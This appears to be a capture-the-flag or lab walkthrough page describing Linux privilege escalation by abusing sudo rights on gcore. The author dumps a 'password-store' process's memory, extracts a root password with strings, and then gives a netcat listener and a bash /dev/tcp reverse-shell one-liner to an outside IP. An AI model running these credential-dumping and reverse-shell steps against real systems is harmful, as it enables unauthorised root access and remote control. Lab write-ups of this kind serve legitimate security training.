privilege escalation

Checking if current user is allowed to run any command as root.

sudo -l

we can see that our current user charles is allowed to /usr/bin/gcore as root user with a password.

change directory for current shell

cd /tmp ; mkdir temp ; cd temp

Information about the binary file.

It can be used to generate core dumps of running processes. Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named core. $PID , that is then often filtered with strings to narrow down relevant information.

Let's search for process having sensitive information.

ps auxf

I can see a process with binary name as password-store . According to me this can have sensitive information. So, I will dump this process data.

sudo gcore 513

I will use the strings command to display the content, as this is binary file data and its information is not in a human-readable format.

string core.513

 -z=
001 Password: root:
ClogKingpinInning731
E?z=
]?z=

From the output, I got the password of the root user.

Using this credential, I will switch to root user.

su root

I will again stabalize the shell.

sudo rlwrap nc -lnvp 443
bash -c "bash -i >& /dev/tcp/192.168.45.234/443 0>&1"

Previoushttp 8081 [Initial Access]Nextlocal.txt

Last updated 1 year ago

Was this helpful?